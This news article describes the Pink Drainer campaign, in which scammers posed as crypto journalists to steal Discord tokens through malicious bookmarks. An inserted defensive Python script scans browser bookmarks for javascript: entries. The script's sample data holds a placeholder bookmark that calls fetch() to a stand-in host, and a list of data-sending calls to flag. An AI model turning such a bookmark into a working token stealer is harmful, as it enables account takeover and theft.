Phishing Campaign Targets Twitter and Discord Accounts to Steal Cryptocurrency
Security researchers have recently uncovered a sophisticated phishing campaign aimed at hijacking Twitter and Discord accounts in order to steal cryptocurrency. The Pink Drainer hacking group has reportedly managed to pilfer over $3 million from more than 2000 victims, including high-profile individuals like OpenAI CTO Mira Murati.
Unusual Social Engineering Tactics
According to Scam Sniffer, which used blockchain analysis to identify the Pink Drainer group, the scammers employed unconventional social engineering techniques. They posed as journalists from reputable outlets such as Decrypt and Cointelegraph to establish trust with their targets.
The process typically involved a 1-3 day interaction with the victim, culminating in a KYC authentication request that led to Discord-related phishing activities. By tricking Discord administrators into opening a malicious Carl verification bot and adding bookmarks containing harmful code, the scammers were able to extract the victim’s Discord token.
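As a defensive check for the bookmark technique described above, the following added example (not from the original article or from Scam Sniffer) audits a browser bookmarks file for entries that run script instead of navigating. It assumes the Chromium-style `Bookmarks` JSON layout; the sample data, function names and the `NETWORK_HINTS` heuristic are constructed for illustration.

```python
import json
from urllib.parse import unquote

# Constructed sample in the layout of a Chromium "Bookmarks" profile file.
# The javascript: entries are harmless placeholders, not real payloads.
SAMPLE_BOOKMARKS = json.dumps({"roots": {
    "bookmark_bar": {"type": "folder", "name": "Bookmarks bar", "children": [
        {"type": "url", "name": "Discord", "url": "https://discord.com/app"},
        {"type": "url", "name": "Verify",
         "url": "javascript:fetch('https://example.invalid/?d=placeholder')"},
        {"type": "folder", "name": "Tools", "children": [
            {"type": "url", "name": "Dark mode",
             "url": "JavaScript:document.body.style.background='%23000'"}]}]},
    "other": {"type": "folder", "name": "Other bookmarks", "children": []}}})

# Assumed heuristic: script that can send data off the page deserves priority.
NETWORK_HINTS = ("fetch(", "xmlhttprequest", "sendbeacon", "websocket")


def walk(node, path=()):
    """Yield (folder_path, name, url) for every URL bookmark under node."""
    if node.get("type") == "url":
        yield "/".join(path), node.get("name", ""), node.get("url", "")
    for child in node.get("children", []):
        yield from walk(child, path + (node.get("name", ""),))


def find_script_bookmarks(bookmarks_json):
    """Return one finding per bookmark whose URL uses the javascript: scheme."""
    roots = json.loads(bookmarks_json).get("roots", {})
    findings = []
    for root in roots.values():
        if not isinstance(root, dict):  # skip non-folder metadata entries
            continue
        for folder, name, url in walk(root):
            # URL schemes are case-insensitive, so normalise before matching.
            if not url.strip().lower().startswith("javascript:"):
                continue
            body = unquote(url).lower()  # decode %xx so hints are not hidden
            hints = [h for h in NETWORK_HINTS if h in body]
            findings.append({"folder": folder, "name": name,
                             "severity": "high" if hints else "review",
                             "network_hints": hints})
    return findings


if __name__ == "__main__":
    for finding in find_script_bookmarks(SAMPLE_BOOKMARKS):
        print(finding)
```

A bookmark that runs script executes in the context of whichever page is open when it is clicked, so any `javascript:` entry on an administrator's machine is worth reviewing even when no network hint matches.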
Method of Attack
Once in possession of the Discord token, the hackers took control of the victim’s account by removing other administrators, elevating their own privileges, and orchestrating infractions that prompted Discord to suspend the account.
As of the latest data, the Pink Drainer group has compromised 2307 victims and siphoned off nearly $3.3 million, including $300,000 stolen from a single individual.
Rising Discord Account Vulnerabilities
Discord accounts have become a prime target for cybercriminals, with previous incidents involving malicious npm packages aimed at harvesting Discord tokens and financial information. In a separate incident earlier this year, Discord itself was breached when a threat actor gained unauthorized access to a third-party customer service agent’s support ticket queue.
It is essential for users to remain vigilant and exercise caution when interacting with unknown entities online to mitigate the risk of falling victim to such phishing attacks.